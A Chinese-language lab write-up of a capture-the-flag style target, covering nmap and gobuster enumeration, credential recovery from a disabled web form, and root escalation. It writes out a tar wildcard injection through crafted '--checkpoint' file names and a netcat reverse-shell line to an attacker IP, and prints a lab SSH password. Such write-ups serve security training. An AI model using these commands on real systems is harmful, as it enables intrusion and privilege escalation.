OSCP 靶场
靶场介绍
|
hostname |
easy |
漏洞挖掘、前端调试、sudoers.d、sudo 提权、tar 通配符漏洞提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.154
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 07:15 EST
Nmap scan report for hostname (192.168.1.154)
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)
| 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)
|_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Panda
MAC Address: 08:00:27:71:8C:14 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.48 ms hostname (192.168.1.154)
目录扫描
──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.154 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.154
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.154/index.php (Status: 200) [Size: 1621]
http://192.168.1.154/assets (Status: 403) [Size: 153]
Progress: 65283 / 882244 (7.40%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 69038 / 882244 (7.83%)
===============================================================
Finished权限获取
前端禁止提交,下面来留下base64编码
将disabled 删除后,提交可抓到数据包
base64 解码后是如下字符串
删除disabled后,提交Kung_Fu_P4nda,获取如下字符串
使用po:!ts-bl4nk 登录ssh ,获取系统权限
权限提升
下载linpeas.sh 扫描发现sudoers.d 可以使用oogway执行bash 命令
查看定时任务,发现定期执行如下命令,root用户每隔1分钟执行一次tar打包命令备份/opt/secret目录
查看该目录下是空的,那么我们可以利用tar通配符漏洞进行提权,在该目录下执行如下命令
利用参考链接:https://www.cnblogs.com/jhinjax/p/17067082.html
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
echo "nc 192.168.1.103 9090 -e /bin/bash" >shell.sh
chmod +x shell.sh
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】hostname
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论